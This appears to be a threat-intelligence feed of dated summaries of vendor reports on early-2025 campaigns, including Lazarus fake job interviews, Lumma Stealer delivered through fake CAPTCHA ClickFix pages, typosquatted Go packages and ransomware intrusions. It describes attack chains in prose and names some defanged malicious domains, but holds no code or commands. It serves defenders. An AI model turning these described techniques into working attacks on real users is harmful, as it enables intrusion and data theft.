Silent Push researchers have confirmed that North Korea’s Lazarus Group, including its subgroup Contagious Interview (Famous Chollima), continues to use Astrill VPN to hide their IP addresses during cyber operations. Recent infrastructure and logs obtained from Contagious Interview show ongoing VPN usage during testing processes. Additionally, DPRK Fake IT workers, previously reported by Google’s Mandiant in September 2024, also rely on Astrill VPN to evade detection by employers. Multiple research partners have independently verified these findings, reinforcing the long-standing pattern of Lazarus Group utilizing Astrill VPN for obfuscation.
Source: https://www.silentpush.com/blog/astrill-vpn/?utm_source=rss&utm_medium=rss&utm_campaign=astrill-vpn
2025-03-12
A_Deep_Dive_into_Angry_Likho
MEDIUM
Intel Source:
Securelist
Intel Name:
A_Deep_Dive_into_Angry_Likho
Date of Scan:
2025-03-12
Impact:
MEDIUM
Summary:
Researchers from Securelist have uncovered a threat actor called Angry Likho, also known as Sticky Werewolf, targeting organisations in Russia and Belarus since 2023. This group operates with a well-run infrastructure and primarily targets employees of major corporations, government agencies and contractors. Angry Likho primarily leverages spear-phishing emails to distribute malware: the email carries an archive file that includes two malicious shortcut (LNK) files along with a legitimate-looking bait document. Once the document is opened, the malware is activated and deploys Lumma Stealer, which is capable of stealing sensitive information including stored banking credentials from web browsers and cryptocurrency wallet files.
Source: https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/
2025-03-12
CL_STA_0049_Targeting_Multiple_Entities
MEDIUM
Intel Source:
Palo Alto
Intel Name:
CL_STA_0049_Targeting_Multiple_Entities
Date of Scan:
2025-03-12
Impact:
MEDIUM
Summary:
Palo Alto researchers have discovered a new threat actor, dubbed CL-STA-0049, suspected to be linked to China. This group emerged in March 2023 and has been targeting government agencies, defense organizations, telecommunications companies, educational institutions and aviation sectors in Southeast Asia and South America. The primary objective of this group is to steal sensitive information from these organisations, including details of high-ranking officials. They leverage an advanced malware called Squidoor, aka FinalDraft. It works on both Windows and Linux systems and provides attackers with remote access to compromised systems.
Source: https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/
2025-03-12
Lazarus_Group_Open_Source_Trap
MEDIUM
Intel Source:
TheRavenFile
Intel Name:
Lazarus_Group_Open_Source_Trap
Date of Scan:
2025-03-12
Impact:
MEDIUM
Summary:
The Marstech Campaign, attributed to the DPRK Lazarus group, utilizes Stark Industry's Bulletproof Hosting Service to host malware and facilitate direct communication. The campaign prominently uses older malware, such as Strela Stealer, BeaverTail, and other JavaScript-based malware, which were previously employed in 2023. Despite the passage of time, Lazarus has not significantly updated its tools or methods, continuing to rely on tactics like job recruitment phishing and NPM package infections. Two hostnames, DESKTOP-GKGI28A and DESKTOP-2NFCDE2, were identified during the campaign's investigation.
Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/Lazarus/Marstech.txt
2025-03-12
Stately_Taurus_Now_Linked_to_Bookworm_Malware
LOW
Intel Source:
Palo Alto
Intel Name:
Stately_Taurus_Now_Linked_to_Bookworm_Malware
Date of Scan:
2025-03-12
Impact:
LOW
Summary:
Unit 42 researchers have discovered that Stately Taurus, a threat group targeting ASEAN-affiliated organizations, overlaps with infrastructure used by the Bookworm malware. Stately Taurus had previously used DLL sideloading to deliver the PubLoad malware, which Unit 42 now believes is unique to this group. Before this discovery, Bookworm had not been linked to any specific actor, but after nearly a decade, researchers confidently associate Stately Taurus with its use.
Source: https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/
2025-03-11
The_Dark_Side_of_Clickbait
LOW
Intel Source:
McAfee
Intel Name:
The_Dark_Side_of_Clickbait
Date of Scan:
2025-03-11
Impact:
LOW
Summary:
McAfee researchers have identified a phishing campaign in which attackers are leveraging fake viral video links to trick people into downloading malware. The scam begins with a PDF file that appears to contain a link to a viral video. When the file is opened, it displays large blue clickable text, “Watch ➤ Click Here To Link (Full Viral Video Link)”, along with a fake video player image. If the user clicks on the link, they are redirected to malicious webpages that show leaked videos, excessive ads and fake notifications to entice users. These pages promote adult content, gambling and misleading download buttons that could lead to malware traps.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-dark-side-of-clickbait-how-fake-video-links-deliver-malware
2025-03-11
Hook_Line_and_Tax_Sink
LOW
Intel Source:
Cofense
Intel Name:
Hook_Line_and_Tax_Sink
Date of Scan:
2025-03-11
Impact:
LOW
Summary:
Researchers from Cofense have discovered a phishing campaign that targets employees during tax season, using their tax returns as a lure to steal Microsoft login credentials. In this campaign, cybercriminals send emails that appear to come from Strategic Tax Planning; many employees only notice the subject line, Tax enrollment, and the instruction inside to complete the task by clicking the View and Manage Tasks button, rather than checking the sender’s email address, which is unrelated. Once clicked, the link takes the employee to a fake Mimecast URL protection page where they are asked to enter their work email and click to verify, after which they are redirected to a CAPTCHA test. After completing the CAPTCHA, they are redirected to a fake Microsoft login page. If the employee enters their email and password here, the attackers steal their login credentials and compromise their account.
Source: https://cofense.com/blog/hook-line-tax-sink
2025-03-11
Chinese_APT_Target_Royal_Thai_Police
LOW
Intel Source:
Cado Security Labs
Intel Name:
Chinese_APT_Target_Royal_Thai_Police
Date of Scan:
2025-03-11
Impact:
LOW
Summary:
Cado researchers have discovered a malware campaign in which the Chinese state-sponsored threat group Mustang Panda is targeting the Royal Thai Police. The attackers leverage phishing emails to send a RAR archive named “Very Urgent, please join the cooperation project to train the FBI course.rar.”, which contains a Word document along with a fake PDF and a folder named $Recycle.bin. When the file is executed, it runs an FTP script embedded in the fake PDF to download and execute the Yokai backdoor, allowing the attackers to gain control over the victim’s system.
Source: https://www.cadosecurity.com/blog/chinese-apt-target-royal-thai-police-in-malware-campaign
2025-03-11
Shadowpad_Malware_Deploys_Ransomware
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Shadowpad_Malware_Deploys_Ransomware
Date of Scan:
2025-03-11
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have discovered the use of Shadowpad malware in the deployment of a previously unknown ransomware family. In two recent incident response engagements in Europe, attackers used weak passwords and overcame multi-factor authentication to gain network access. Over the last seven months, at least 21 companies from 15 countries in Europe, the Middle East, Asia, and South America have been targeted using identical strategies. The attackers primarily targeted the manufacturing sector, with Shadowpad deployed on domain controllers following the initial breach.
Source: https://www.trendmicro.com/en_us/research/25/b/updated-shadowpad-malware-leads-to-ransomware-deployment.html
2025-03-10
The_GitVenom_Campaign
LOW
Intel Source:
Securelist
Intel Name:
The_GitVenom_Campaign
Date of Scan:
2025-03-10
Impact:
LOW
Summary:
Researchers at Securelist have uncovered the GitVenom campaign, in which attackers are targeting GitHub users by tricking them into downloading malicious code from fake projects. This campaign has been active for two years and primarily targets Russia, Brazil and Turkey. The attackers have created hundreds of deceptive repositories that contain fake software, such as tools for automating Instagram interactions, managing Bitcoin wallets via Telegram or hacking the video game Valorant. These fake projects are written in various programming languages, including Python, JavaScript, C, C++ and C#. The main goal is to download more malicious files from an attacker-controlled GitHub account and run them on the victim's computer.
Source: https://securelist.com/gitvenom-campaign/115694/
2025-03-10
Phishing_Campaign_Targets_Online_Sellers
LOW
Intel Source:
Cisco Talos
Intel Name:
Phishing_Campaign_Targets_Online_Sellers
Date of Scan:
2025-03-10
Impact:
LOW
Summary:
Researchers at Cisco Talos have uncovered a recent phishing campaign targeting online marketplace sellers. The scammers are using the platforms' direct messaging features to steal sellers' credit card details for their payout accounts. Common scam tactics include altering shipment details, pressuring sellers to conduct off-platform transactions, and attempting to use “friends and family” payment options, which bypass seller protections. These phishing efforts may either compromise the seller’s account, allowing attackers to manipulate listings and shipments, or steal financial information like bank account or credit card details to commit fraud.
Source: https://blog.talosintelligence.com/online-marketplace-scams/
2025-03-10
PolarEdge_Botnet
LOW
Intel Source:
Sekoia
Intel Name:
PolarEdge_Botnet
Date of Scan:
2025-03-10
Impact:
LOW
Summary:
Researchers from Sekoia have observed attackers exploiting a vulnerability, CVE-2023-20118, in Cisco Small Business routers that allows them to run remote commands on vulnerable devices. In January, the attackers leveraged this flaw to install a webshell that allowed them to control the router remotely. In February, attackers used a botnet to distribute a malicious script. This script installs a backdoor called PolarEdge, which is capable of encrypted communication. The botnet has been active since 2023 and has infected 2,000 devices globally. It primarily targets routers and network storage devices from vendors such as Asus, QNAP, and Synology.
Source: https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/#h-iocs
2025-03-10
DeceptiveDevelopment_Campaign
MEDIUM
Intel Source:
ESET
Intel Name:
DeceptiveDevelopment_Campaign
Date of Scan:
2025-03-10
Impact:
MEDIUM
Summary:
ESET researchers have identified a campaign called DeceptiveDevelopment, linked to a North Korean threat actor, that targets freelance software developers. The campaign has been active since 2023 and targets developers involved in cryptocurrency and decentralized finance projects. The attackers pretend to be recruiters and approach developers on job search and freelancing websites. They ask candidates to complete a coding test using project files that contain malware. Once the files are opened, the victim’s system is compromised. They use two malware families, BeaverTail and InvisibleFerret, which allow attackers to steal cryptocurrency wallets, login credentials stored in web browsers and password managers, and other sensitive information.
Source: https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/
2025-03-09
Russian_Threat_Actors_Target_Signal
MEDIUM
Intel Source:
Google Cloud
Intel Name:
Russian_Threat_Actors_Target_Signal
Date of Scan:
2025-03-09
Impact:
MEDIUM
Summary:
Researchers from Google Threat Intelligence Group have found an increase in efforts by several Russia-aligned threat actors to breach Signal Messenger accounts, notably those of individuals of interest to Russia's intelligence agencies. These attacks, which are most likely motivated by wartime intelligence demands, largely use Signal's "linked devices" functionality using phishing techniques that trick users into attaching their accounts to threat actor-controlled devices.
Source: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/
2025-03-09
Rapid_Phishing_Attack_Targets_Manufacturer
LOW
Intel Source:
Reliaquest
Intel Name:
Rapid_Phishing_Attack_Targets_Manufacturer
Date of Scan:
2025-03-09
Impact:
LOW
Summary:
ReliaQuest researchers have recently responded to a manufacturing sector breach involving phishing and data exfiltration, where attackers achieved a rapid breakout time of just 48 minutes. The attackers, linked to the Black Basta ransomware group, used social engineering tactics, including a flood of spam emails from a spoofed domain, and convinced users to open a remote-access tool, Quick Assist. This allowed the attackers to gain control of at least two user machines, progressing their attack quickly.
Source: https://www.reliaquest.com/blog/blink-and-theyre-in-how-rapid-phishing-attacks-exploit-weaknesses/
2025-03-09
ACRStealer_Infostealer
LOW
Intel Source:
ASEC
Intel Name:
ACRStealer_Infostealer
Date of Scan:
2025-03-09
Impact:
LOW
Summary:
ASEC researchers have observed cybercriminals distributing ACRStealer disguised as illegal software such as cracks and keygens. Earlier, LummaC2 was the malware most commonly distributed this way, but ACRStealer is now distributed more frequently. This malware first appeared in June last year and uses a stealthy technique called Dead Drop Resolver to hide its C2 server address inside legitimate websites such as Google Docs. Compared with previous infostealers, it is more flexible in how it obtains its server address and constantly changes its location.
Source: https://asec.ahnlab.com/ko/86365/
2025-03-08
BeaverTail_and_InvisibleFerret
LOW
Intel Source:
Slovenia
Intel Name:
BeaverTail_and_InvisibleFerret
Date of Scan:
2025-03-08
Impact:
LOW
Summary:
CERT-Slovenia researchers have highlighted an attack where cybercriminals impersonate job seekers or collaborators to trick victims into running malicious code. They initially contact targets via LinkedIn and send a link to a seemingly harmless demo project. Once launched, the project executes two malicious modules: BeaverTail (written in Node.js) and InvisibleFerret (written in Python). BeaverTail steals data and creates a backdoor, while InvisibleFerret serves a different purpose. Security experts believe these activities are linked to state-sponsored hackers from North Korea.
Source: https://www.cert.si/tz016/
2025-03-08
Analysis_of_XWorm_Malware_Variant
LOW
Intel Source:
ISC.SANS
Intel Name:
Analysis_of_XWorm_Malware_Variant
Date of Scan:
2025-03-08
Impact:
LOW
Summary:
Researchers at SANS have analyzed a sophisticated piece of malware, specifically, a variant of XWorm, which uses advanced obfuscation techniques to evade detection, including PowerShell functions to decode and decompress data. It leverages scheduled tasks and registry modifications for persistence, and communicates with a Telegram API to exfiltrate data. The malware also collects system information, likely for further exploitation, and can execute DDoS attacks. The file names are deliberately misleading (e.g., "XingCode Unblocker 2025.exe") to disguise its true nature.
Source: https://isc.sans.edu/diary/rss/31700
2025-03-08
Black_Basta_Phishing_Attack_Spotted
LOW
Intel Source:
ReliaQuest
Intel Name:
Black_Basta_Phishing_Attack_Spotted
Date of Scan:
2025-03-08
Impact:
LOW
Summary:
Researchers from ReliaQuest have discovered a fast-moving phishing attack in the industrial sector, in which attackers gained entry to the network and expanded their access within 48 minutes, significantly faster than before. They used techniques associated with the "Black Basta" ransomware group to steal data. This demonstrates that attackers are becoming faster, making timely security response more essential than ever.
Source: https://www.reliaquest.com/blog/blink-and-theyre-in-how-rapid-phishing-attacks-exploit-weaknesses/
2025-03-07
Ghostwriter_Targets_Ukraine_and_Belarus
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Ghostwriter_Targets_Ukraine_and_Belarus
Date of Scan:
2025-03-07
Impact:
MEDIUM
Summary:
SentinelLabs researchers have identified an ongoing cyber campaign targeting opposition activists in Belarus and Ukrainian military and government organizations. The campaign, which began preparations in July-August 2024, became active in November-December 2024. Recent malware samples and command-and-control infrastructure activity suggest that the operation is still active. They believe this campaign is an extension of the long-running Ghostwriter campaign, which has been previously reported.
Source: https://www.sentinelone.com/labs/ghostwriter-new-campaign-targets-ukrainian-government-and-belarusian-opposition/
2025-03-07
Sandworm_APT_Targets_Ukrainian_Users
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
Sandworm_APT_Targets_Ukrainian_Users
Date of Scan:
2025-03-07
Impact:
MEDIUM
Summary:
Researchers from EclecticIQ have uncovered a cyber espionage campaign conducted by Sandworm, a threat group linked to Russia’s military intelligence agency, targeting Ukrainian Windows users. The campaign started in late 2023, with attackers leveraging a malware-infected version of a Microsoft Key Management Service activation tool. The attackers disguise this tool as a legitimate Windows activator and upload it to torrent websites to trick users into downloading and running it. Once executed, the Backorder malware silently installs itself in the background and then downloads and executes Dark Crystal RAT, which allows attackers to steal sensitive data, spy on the infected system and potentially take control of it.
Source: https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns
2025-03-07
Lumma_Stealer_Malware_Hits_Multiple_Sectors
MEDIUM
Intel Source:
CloudSEK
Intel Name:
Lumma_Stealer_Malware_Hits_Multiple_Sectors
Date of Scan:
2025-03-07
Impact:
MEDIUM
Summary:
CloudSEK researchers have observed the Lumma Stealer malware campaign that is exploiting compromised educational institutions to distribute malicious LNK files disguised as PDFs. These files target sectors such as finance, healthcare, technology, and media. Upon execution, they trigger a covert, multi-stage infection process, enabling cybercriminals to steal sensitive information like passwords, browser data, and cryptocurrency wallets. The malware employs advanced evasion methods, including utilizing Steam profiles for command-and-control functions.
Source: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure
2025-03-06
Typosquatted_Go_Packages_Target_Linux_and_MacOS
LOW
Intel Source:
Socket
Intel Name:
Typosquatted_Go_Packages_Target_Linux_and_MacOS
Date of Scan:
2025-03-06
Impact:
LOW
Summary:
Researchers from Socket have discovered a malicious campaign targeting developers who use the Go programming language by uploading fake versions of Go libraries. These typosquatted packages closely mimic legitimate ones but secretly install malware that targets Linux and MacOS systems. The attackers have created seven packages, including four that impersonate the legitimate HTTP API testing tool Hypert. These malicious versions contain a hidden function, qcJjJne(), that secretly downloads and runs malicious scripts from suspicious websites such as alturastreet[.]icu, host3ar[.]com, and binghost7[.]com.
Source: https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader
2025-03-06
Diving_Deep_into_Hellcat_Ransomware
LOW
Intel Source:
Bridewell
Intel Name:
Diving_Deep_into_Hellcat_Ransomware
Date of Scan:
2025-03-06
Impact:
LOW
Summary:
Hellcat is a new and aggressive Ransomware-as-a-Service (RaaS) group, first identified in late 2024, known for high-profile cyberattacks across multiple industries, including telecommunications, government, and IT. Their tactics include phishing, exploiting public-facing applications, and deploying advanced PowerShell infection chains to establish persistence and control via SliverC2 malware. Hellcat also uses custom ransomware payloads, Living-off-the-Land (LotL) techniques, and unique exfiltration methods leveraging SFTP and cloud services.
Source: https://www.bridewell.com/insights/blogs/detail/who-are-hellcat-ransomware-group
2025-03-05
DragonForce_Ransomware
MEDIUM
Intel Source:
Resecurity
Intel Name:
DragonForce_Ransomware
Date of Scan:
2025-03-05
Impact:
MEDIUM
Summary:
Resecurity researchers have uncovered a ransomware group called DragonForce targeting real estate and construction companies in Riyadh, Saudi Arabia. The group has exfiltrated 6TB of sensitive data and threatens to release it just before Ramadan if the ransom is not paid. DragonForce first appeared in 2023 and operates as a Ransomware-as-a-Service (RaaS) group. It is aggressively expanding its network and advertises its services on the RAMP underground forum to attract affiliates, with promises of high payouts, strong technical support and even call services to pressure victims. The group has also developed advanced ransomware payload builders on the dark web that allow affiliates to customize their attacks significantly.
Source: https://www.resecurity.com/blog/article/dragonforce-ransomware-group-is-targeting-saudi-arabia
2025-03-05
Multiple_Malware_Using_Encryption_and_Virtualization
LOW
Intel Source:
Palo Alto
Intel Name:
Multiple_Malware_Using_Encryption_and_Virtualization
Date of Scan:
2025-03-05
Impact:
LOW
Summary:
Palo Alto researchers have observed malware developers using multiple tricks to hide malicious code from security tools and sandboxes. Most of the malware families examined, such as Agent Tesla, XWorm and FormBook/XLoader, use obfuscation techniques to avoid detection. These families employ various methods, including code virtualization, where malware instructions are converted into a custom language. One common method is hiding the malware payload inside extra data at the end of a file, known as the PE overlay. Dynamic code loading and .NET reflection allow malware to modify or add new code while running. Additionally, AES encryption is used to encrypt critical malware components.
Source: https://unit42.paloaltonetworks.com/malware-obfuscation-techniques/
2025-03-04
Havoc_Demon_Agent
MEDIUM
Intel Source:
Fortinet
Intel Name:
Havoc_Demon_Agent
Date of Scan:
2025-03-04
Impact:
MEDIUM
Summary:
Researchers from FortiGuard have uncovered a phishing campaign that leverages a ClickFix technique along with multi-stage malware to deliver an advanced version of Havoc Demon. Havoc is a C2 framework that cybercriminals use to gain full control over compromised systems. This customized version of Havoc Demon communicates via the Microsoft Graph API to disguise its malicious traffic. The attack starts with a phishing email that contains an HTML attachment and urges the recipient to open it. Once the user opens the file, it shows a fake error message and deceives the user into copying and executing a malicious PowerShell command. This command downloads and runs a remote PowerShell script, ultimately deploying the advanced Havoc Demon Agent.
Source: https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
2025-03-04
Highly_Targeted_Polyglot_Malware_Attack
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Highly_Targeted_Polyglot_Malware_Attack
Date of Scan:
2025-03-04
Impact:
MEDIUM
Summary:
Proofpoint researchers have uncovered a highly targeted email-based cyber campaign against a few entities in the UAE, specifically those interested in aviation, satellite communications, and critical transportation infrastructure. The attackers used compromised, trusted business relationships to deliver customized phishing lures. This campaign led to the discovery of a new backdoor malware, dubbed Sosano, which employs advanced obfuscation techniques, including polyglot files, to evade detection. The adversary behind this attack demonstrates significant development capabilities and a strong intent to protect their payloads. Proofpoint tracks this threat cluster as UNK_CraftyCamel.
Source: https://www.proofpoint.com/us/blog/threat-insight/call-it-what-you-want-threat-actor-delivers-highly-targeted-multistage-polyglot
2025-03-04
Infostealer_Campaign_against_ISPs
LOW
Intel Source:
Splunk
Intel Name:
Infostealer_Campaign_against_ISPs
Date of Scan:
2025-03-04
Impact:
LOW
Summary:
Researchers at Splunk have identified a cyber campaign targeting ISP infrastructure providers in the U.S. (West Coast) and China. Originating from Eastern Europe, the attack leverages weak credentials for initial access, followed by data exfiltration via C2 servers, deployment of additional crimeware, self-termination for evasion, and persistence measures. Attackers primarily use scripting languages like Python and PowerShell to operate stealthily and utilize Telegram for C2 communication. The main objective appears to be cryptomining (XMR), with attackers pivoting through compromised CIDRs while minimizing detection.
Source: https://www.splunk.com/en_us/blog/security/infostealer-campaign-against-isps.html
2025-03-04
Lumma_Stealer_Targeting_Booking_Websites
MEDIUM
Intel Source:
G-Data
Intel Name:
Lumma_Stealer_Targeting_Booking_Websites
Date of Scan:
2025-03-04
Impact:
MEDIUM
Summary:
GDATA researchers have identified a campaign in which booking websites are being exploited to distribute Lumma Stealer. This malware first appeared in 2023 and operates as Malware-as-a-Service. The attackers deceive users with fake CAPTCHA prompts on booking websites; when users "verify" the CAPTCHA, malware is silently downloaded onto their system. They are targeting users looking to book trips to Palawan, Philippines, and hotels in Munich, Germany. Initially, the malware was spread through platforms like Telegram and GitHub, but attackers are now using malicious ads to reach more victims.
Source: https://www.gdatasoftware.com/blog/2025/03/38154-lummastealer-fake-recaptcha
2025-03-03
Black_Basta_and_Cactus_Use_BackConnect
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Black_Basta_and_Cactus_Use_BackConnect
Date of Scan:
2025-03-03
Impact:
MEDIUM
Summary:
Attackers leveraged social engineering, Microsoft Teams, and remote access tools such as Quick Assist to gain unauthorized access. They exploited OneDriveStandaloneUpdater.exe for DLL side-loading and deployed BackConnect malware, linked to QakBot, for persistent control. Black Basta and Cactus ransomware operators use this malware after the initial compromise. Additionally, attackers abuse WinSCP and commercial cloud storage services for data exfiltration. Trend Micro researchers have reported 39 breaches since October 2024, with the US being the most affected.
Source: https://www.trendmicro.com/en_us/research/25/b/black-basta-cactus-ransomware-backconnect.html
2025-03-03
Sneaky2FA_Phishing_Kit_Bypasses_2FA
LOW
Intel Source:
Esentire
Intel Name:
Sneaky2FA_Phishing_Kit_Bypasses_2FA
Date of Scan:
2025-03-03
Impact:
LOW
Summary:
Researchers at Esentire have observed a user accessing a phishing site linked to Sneaky2FA, a Phishing-as-a-Service kit designed to bypass two-factor authentication (2FA) and steal session cookies. The attack starts with a spam email containing a OneDrive link to a deceptive PDF. When the user opens the PDF and clicks the embedded link, they are redirected to a fraudulent Office 365 login page controlled by Sneaky2FA. The attackers then use the stolen session cookies through VPNs to maintain access to compromised accounts. Once access is gained, they often modify existing MFA settings or register new MFA methods to ensure long-term control over the account.
Source: https://www.esentire.com/blog/your-mfa-is-no-match-for-sneaky2fa
2025-03-02
Hunting_the_Web_Shell
LOW
Intel Source:
Securelist
Intel Name:
Hunting_the_Web_Shell
Date of Scan:
2025-03-02
Impact:
LOW
Summary:
The Securelist SOC team responded to an alert triggered by Kaspersky Endpoint Security, which detected a web shell on a government SharePoint server. The attackers used certutil to download a malicious ASPX payload from a service called Bashupload, obfuscating the command to evade detection. The payload was disguised as a 404 error page, allowing the attacker to maintain persistence. The investigation revealed that the web shell was part of a modular exploitation framework commonly used by Chinese-speaking threat actors.
Source: https://securelist.com/soc-files-web-shell-chase/115714/
2025-03-02
Lotus_Blossom_Targets_Industries_with_Sagerunex
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Lotus_Blossom_Targets_Industries_with_Sagerunex
Date of Scan:
2025-03-02
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have discovered multiple cyber espionage campaigns targeting government, manufacturing, telecommunications, and media sectors, attributed to the Lotus Blossom threat group. Active since at least 2012, Lotus Blossom uses the Sagerunex backdoor for post-compromise activities, including gaining persistence by configuring the backdoor to run as a service on infected systems. The group has also developed new Sagerunex variants that utilize both traditional command-and-control servers and legitimate third-party cloud services like Dropbox, Twitter, and Zimbra for communication.
Source: https://blog.talosintelligence.com/lotus-blossom-espionage-group/
2025-03-01
North_Korean_Hackers_Target_macOS_Users
LOW
Intel Source:
Palo Alto
Intel Name:
North_Korean_Hackers_Target_macOS_Users
Date of Scan:
2025-03-01
Impact:
LOW
Summary:
Palo Alto researchers have uncovered a Rust-based macOS malware, named RustDoor, which disguises itself as a legitimate software update. They also identified a previously unknown macOS variant of the Koi Stealer malware family. During their investigation, they observed advanced evasion techniques, manipulating macOS components to avoid detection. These tactics align with recent reports of North Korean threat actors targeting job seekers. Based on these findings, there is a moderate level of confidence that the attack was carried out on behalf of the North Korean regime.
Source: https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/
2025-03-01
Erudite_Mogwai_Leverages_Custom_Stowaway
LOW
Intel Source:
SOLAR
Intel Name:
Erudite_Mogwai_Leverages_Custom_Stowaway
Date of Scan:
2025-03-01
Impact:
LOW
Summary:
A cyber-attack was detected during daily monitoring at the Solar JSOC countermeasure center, with mass executions of Impacket AtExec. The investigation traced the attack to an unmonitored network segment, where Stowaway and ShadowPad Light samples were found. The attack, originating from publicly accessible web services, began as early as March 2023. In November 2024, the attackers attempted to expand their reach but were detected. The attackers modified Stowaway, creating a custom version with obfuscation techniques, including LZ4 compression and XXTEA encryption, and added support for the QUIC protocol to proxy traffic.
Source: https://rt-solar.ru/solar-4rays/blog/5261/
2025-02-28
Njrat_Campaign_Using_Microsoft_Dev_Tunnels
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
Njrat_Campaign_Using_Microsoft_Dev_Tunnels
Date of Scan:
2025-02-28
Impact:
MEDIUM
Summary:
Recent malware samples have been discovered using Microsoft’s dev tunnels service to connect to their C2 servers, exploiting the service meant for secure remote access by developers. These samples, which share the same ImpHash, use different dev tunnel URLs to send status updates and potentially propagate through USB devices. To detect this activity, monitoring DNS logs for requests to devtunnels.ms is recommended. Additionally, scanning for unusual registry entries and network traffic can help identify infected systems, especially considering the malware's persistence mechanisms.
Source: https://isc.sans.edu/diary/Njrat+Campaign+Using+Microsoft+Dev+Tunnels/31724/
2025-02-28
Lazarus_Group_Linked_to_Bybit_Heist
MEDIUM
Intel Source:
Silent Push
Intel Name:
Lazarus_Group_Linked_to_Bybit_Heist
Date of Scan:
2025-02-28
Impact:
MEDIUM
Summary:
Researchers at Silent Push have uncovered sensitive infrastructure used by the Lazarus APT Group, linking them to the $1.4 billion Bybit crypto heist. They identified a newly registered domain tied to a previously used email address and found "Lazaro" mentioned in logs, indicating a connection to Lazarus. The team also discovered 27 unique Astrill VPN IP addresses associated with the group, confirming their preference for this VPN. Additionally, Lazarus continues using fake LinkedIn job interviews to distribute malware. The Lazarus Group, linked to North Korea's Reconnaissance General Bureau, has been active since 2009 and is known for large-scale cyber operations.
Source: https://www.silentpush.com/blog/lazarus-bybit/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-bybit
2025-02-28
Fake_CAPTCHA_Delivers_Lumma_Stealer
LOW
Intel Source:
Seqrite
Intel Name:
Fake_CAPTCHA_Delivers_Lumma_Stealer
Date of Scan:
2025-02-28
Impact:
LOW
Summary:
Seqrite researchers have discovered a new malware campaign delivering Lumma Stealer, an infostealer operating under the malware-as-a-service model. The attackers continue using the ClickFix tactic, which involves phishing and fake reCAPTCHA pages, but have now shifted to impersonating Cloudflare verification pages. Victims are tricked into running malicious commands via clipboard manipulation. The campaign uses MSHTA and PowerShell to deliver a .NET loader, further advancing the infection chain.
Source: https://www.seqrite.com/blog/fake-captcha-lures-victims-lumma-stealer-abuses-clipboard-and-powershell/
2025-02-27
DeepSeek_Using_CAPTCHAs_To_Spread_Malware
LOW
Intel Source:
Zscaler
Intel Name:
DeepSeek_Using_CAPTCHAs_To_Spread_Malware
Date of Scan:
2025-02-27
Impact:
LOW
Summary:
Zscaler researchers have identified a campaign in which attackers impersonate the DeepSeek brand by creating fake websites that appear legitimate. When a user visits a fake DeepSeek website, they are asked to complete a CAPTCHA verification process that looks legitimate but actually hides a malicious script, which silently copies a malicious PowerShell command onto the user's clipboard. If the user unknowingly pastes and executes this command, it downloads and runs Vidar Stealer, malware capable of collecting sensitive data including login credentials, banking information and cryptocurrency wallets. The attackers use Telegram and Steam for their C2 communications to hide their malicious activity.
Source: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
2025-02-27
Silver_Fox_APT_Targets_Healthcare_with_Malware
HIGH
Intel Source:
Forescout Research
Intel Name:
Silver_Fox_APT_Targets_Healthcare_with_Malware
Date of Scan:
2025-02-27
Impact:
HIGH
Summary:
Forescout researchers have uncovered a campaign by the China-based APT group Silver Fox, which exploited Philips DICOM viewers to deploy malware on victim systems. The malicious software, masquerading as legitimate viewers, included ValleyRAT, a backdoor remote access tool, along with a keylogger and crypto miner. Healthcare, already a major target for cyberattacks in 2023 and 2024, saw these threats as part of a broader trend, with Silver Fox using these exploits to gain control over medical applications and systems, potentially disrupting patient care and compromising sensitive data.
Source: https://www.forescout.com/blog/healthcare-malware-hunt-part-1-silver-fox-apt-targets-philips-dicom-viewers/
2025-02-26
Auto_Color_A_Linux_Malware
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Auto_Color_A_Linux_Malware
Date of Scan:
2025-02-26
Impact:
MEDIUM
Summary:
Researchers at Palo Alto have discovered a Linux-based malware called Auto-Color that provides full remote access to compromised machines. It primarily targets universities and government offices in North America and Asia. It disguises itself under different names, such as "door" or "egg", and renames itself to Auto-Color once installed. If the user has admin access, the malware installs a fake system library that mimics a legitimate Linux library to avoid detection. The malware also modifies a system file to ensure its malicious code runs before any other functions.
Source: https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/
2025-02-26
Salt_Typhoon_Targets_US_Telecoms
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Salt_Typhoon_Targets_US_Telecoms
Date of Scan:
2025-02-26
Impact:
MEDIUM
Summary:
Cisco Talos researchers have monitored a sophisticated intrusion campaign by Salt Typhoon, a threat actor targeting U.S. telecommunications companies. The campaign, which began in late 2024, primarily involves gaining access to Cisco network devices using legitimate login credentials. Only one instance of exploitation of a known Cisco vulnerability (CVE-2018-0171) was identified, and no new vulnerabilities were discovered. The threat actor employs living-off-the-land (LOTL) techniques to persist in environments for extended periods, sometimes for over three years.
Source: https://blog.talosintelligence.com/salt-typhoon-analysis/
2025-02-26
A_Growing_Threat_of_Browser_Fingerprinting
LOW
Intel Source:
Group IB
Intel Name:
A_Growing_Threat_of_Browser_Fingerprinting
Date of Scan:
2025-02-26
Impact:
LOW
Summary:
